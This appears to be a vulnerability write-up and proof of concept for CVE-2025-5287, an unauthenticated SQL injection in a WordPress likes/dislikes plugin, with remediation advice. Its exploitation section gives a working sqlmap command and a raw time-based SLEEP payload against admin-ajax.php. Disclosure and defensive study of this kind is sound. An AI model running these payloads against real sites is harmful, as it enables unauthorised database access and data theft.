
# 🔥 WordPress Likes and Dislikes Plugin ≤ 1.0.0 - Unauthenticated SQL Injection

## 🧠 CVE ID: CVE-2025-5287
> **Discovered by:** Khaled_Alenazi (Nxploited)  
> **Published on:** 27 May, 2025

---

## 📋 Description

The **Likes and Dislikes Plugin** for WordPress is vulnerable to **SQL Injection** through the `post` parameter in all versions **up to and including 1.0.0**.  
Due to **insufficient escaping** and lack of prepared statements, unauthenticated attackers can inject raw SQL into backend queries, leading to **data leakage or manipulation**.

---

## 🧬 Technical Details

- **Vulnerable Parameter:** `post`
- **Vulnerability Type:** SQL Injection (Boolean-based and Time-based)
- **HTTP Method:** POST
- **Affected Endpoint:** `/wp-admin/admin-ajax.php`
- **Patch Status:** ❌ Not Fixed
- **Required Privileges:** None (Unauthenticated)
- **CVSS Score:** 9.3 (High)
- **OWASP Top 10:** A1 - Injection

---

## 💥 Exploitation

### ✅ SQLMap Command (Time-based Blind SQLi):
```bash
sqlmap -u "http://TARGET/wp-admin/admin-ajax.php" \
--data "action=my_likes_dislikes_action&post=1&state=like" \
--method POST --risk 3 --level 5 --batch --time-sec=5 --dbs
```
> This command confirms the injection point and enumerates databases using a time-based technique.

### 🧪 POC Payload (Manual - Time-based):
```http
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: nxploit.ddev.site
Content-Type: application/x-www-form-urlencoded
Connection: close

action=my_likes_dislikes_action&post=1 AND (SELECT 1234 FROM (SELECT(SLEEP(5)))a)&state=like
```

---

## 🧪 Evidence Summary

1. **SQLMap Enumeration:**
   - Detected `boolean-based blind` and `time-based blind` SQLi.
   - Confirmed backend is **MySQL**.
   - Enumerated databases: `db`, `test`, `information_schema`.

   ![SQLMap Proof](https://github.com/Nxploited/CVE-2025-5287/blob/main/sqlmap_result.png)

2. **Manual Verification with Burp Suite:**
   - HTTP response delay confirmed via time-based payload.
   - Delay exceeded `15 seconds`, indicating true injection.

   ![Burp Suite Proof](https://github.com/Nxploited/CVE-2025-5287/blob/main/burp_proof.png)

---

## ⚠️ Risks

- **CVSS Severity:** 9.3 (High)
- This vulnerability can be used to extract sensitive data without authentication.

---

## 🔗 References

- https://patchstack.com/database/wordpress/plugin/inprosysmedia-likes-dislikes-post/vulnerability/wordpress-likes-and-dislikes-plugin-plugin-1-0-0-unauthenticated-sql-injection-vulnerability
- https://nvd.nist.gov/vuln/detail/CVE-2025-5287

---

## 🛡️ Recommendations

- Immediately sanitize and parameterize input from `post`.
- Use **prepared statements**.
- Implement **WAF** and **rate-limiting** to reduce brute-force injection attempts.

---

## ⚠️ Disclaimer

This content is provided for **educational and research purposes** only.  
The author does **not condone** malicious activity or exploitation of systems without **explicit authorization**.

---

## 👤 Author

**Khaled_Alenazi (Nxploited)**


